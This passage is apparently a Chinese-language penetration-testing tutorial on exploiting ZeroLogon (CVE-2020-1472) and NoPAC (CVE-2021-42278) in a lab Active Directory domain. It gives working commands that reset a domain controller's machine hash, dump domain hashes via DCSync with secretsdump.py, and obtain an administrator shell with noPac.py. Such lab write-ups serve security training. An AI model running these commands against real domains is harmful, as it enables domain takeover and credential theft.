Skip to main content

历史漏洞的利用

CVE-2020-1472 ZeroLogon漏洞

因为脆弱的密码学设计,攻击者可以绕过认证并模仿任何域主机,包括域控制器,以实现提权。这里我们使用来自 https://github.com/dirkjanm/CVE-2020-1472leitosama/SharpZeroLogon exp。在之前的章节中,我们使用该工具的检测模式检测出了 dc01 受该漏洞影响。我们再来回顾一下:

1:运行在域内环境的话,我们只需要指定域控制器即可,发现该域控可被 cve-2022-1472-exploit.pyzerologon 漏洞的攻击所接管。

image.png

增加 -reset 选项,来重置 dc01 主机的凭证:

image.png

这时,dc01 主机的哈希被重置为显示出的指定 NTLM。得到了 dc01 主机的新哈希后,我们可以使用 CobaltStrike 内置的 PTH 命令。但是该命令需要当前主机的提升特权,而且因为会补丁 lsass.exe,一方面是特征较为显著,另一方面是会被 RunAsPPL 所阻止 (我们会在下一章节详细讲解 PTH 以及 RunAsPPL) 。

image.png

image.png

我们可以使用 Impacket 中的 secretdump 脚本,我们需要提供DC的IP以及netbios名来实现:

2:之后,使用impacket中的secretdump.

proxychains secretsdump.py  脚本,加上-dc-ip 172.16.1.11 -just-dc 以及-hashes -no-pass:31d6cfe0d16ae931b73c59d7e0c089c0 参数,通过DCSync导出哈希。

'dc01$'@prod.raven-med.local


image.png

CVE-2021-42278 NoPAC漏洞

该漏洞实际上利用了主机账号的伪造,攻击者可以从普通用户提升为域管理员。这里,我们使用来自 https://github.com/Ridter/noPac 的exp。

1:使用exp一键拿shell python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator